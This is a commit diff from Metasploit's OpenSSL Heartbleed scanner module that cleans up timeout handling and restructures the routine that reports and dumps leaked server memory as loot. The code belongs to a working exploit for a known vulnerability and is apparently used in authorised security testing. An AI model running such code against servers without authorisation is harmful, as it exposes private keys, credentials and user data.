Merge pull request #1 from jvazquez-r7/review_3238

Clean timeout handling code
bturner-r7 · Apr 18, 2014 · c68b7aa · c68b7aa
2 parents e38f4cb + 2366f77
commit c68b7aa
Showing 1 changed file with 46 additions and 35 deletions.
diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -169,6 +169,11 @@ def run
       return
     end
 
+    if response_timeout < 0
+      print_error("RESPONSE_TIMEOUT should be bigger than 0")
+      return
+    end
+
     super
   end
 
@@ -295,10 +300,10 @@ def run_host(ip)
     end
   end
 
-  def bleed()
+  def bleed
     # This actually performs the heartbleed portion
     connect_result = establish_connect
-    return :timeout if (connect_result) == :timeout
+    return if connect_result.nil?
 
     vprint_status("#{peer} - Sending Heartbeat...")
     sock.put(heartbeat(heartbeat_length))
@@ -343,39 +348,43 @@ def bleed()
   end
 
   def loot_and_report(heartbeat_data)
-    return if heartbeat_data == :timeout
-    if heartbeat_data
-        print_good("#{peer} - Heartbeat response with leak")
-        report_vuln({
-          :host => rhost,
-          :port => rport,
-          :name => self.name,
-          :refs => self.references,
-          :info => "Module #{self.fullname} successfully leaked info"
-        })
-        if action.name == 'DUMP' # Check mode, dump if requested.
-          pattern = datastore['DUMPFILTER']
-          if pattern
-            match_data = heartbeat_data.scan(pattern).join
-          else
-            match_data = heartbeat_data
-          end
-          path = store_loot(
-            "openssl.heartbleed.server",
-            "application/octet-stream",
-            rhost,
-            match_data,
-            nil,
-            "OpenSSL Heartbleed server memory"
-          )
-          print_status("#{peer} - Heartbeat data stored in #{path}")
-        end
-        vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}")
+
+    unless heartbeat_data
+      vprint_error("#{peer} - Looks like there isn't leaked information...")
+      return
+    end
+
+    print_good("#{peer} - Heartbeat response with leak")
+    report_vuln({
+      :host => rhost,
+      :port => rport,
+      :name => self.name,
+      :refs => self.references,
+      :info => "Module #{self.fullname} successfully leaked info"
+    })
+
+    if action.name == 'DUMP' # Check mode, dump if requested.
+      pattern = datastore['DUMPFILTER']
+      if pattern
+        match_data = heartbeat_data.scan(pattern).join
       else
-        vprint_error("#{peer} - Looks like there isn't leaked information...")
+        match_data = heartbeat_data
       end
+      path = store_loot(
+        "openssl.heartbleed.server",
+        "application/octet-stream",
+        rhost,
+        match_data,
+        nil,
+        "OpenSSL Heartbleed server memory"
+      )
+      print_status("#{peer} - Heartbeat data stored in #{path}")
     end
 
+    vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}")
+
+  end
+
   def getkeys()
     unless datastore['TLS_CALLBACK'] == 'None'
       print_error('TLS callbacks currently unsupported for keydumping action') #TODO
@@ -508,7 +517,7 @@ def establish_connect
       res = self.send(TLS_CALLBACKS[datastore['TLS_CALLBACK']])
       if res.nil?
         vprint_error("#{peer} - STARTTLS failed...")
-        return
+        return nil
       end
     end
 
@@ -519,13 +528,15 @@ def establish_connect
     unless server_hello
       vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...")
       disconnect
-      return :timeout
-    end    
+      return nil
+    end
 
     unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE
       vprint_error("#{peer} - Server Hello Not Found")
-      return
+      return nil
     end
+
+    true
   end
 
   def key_from_pqe(p, q, e)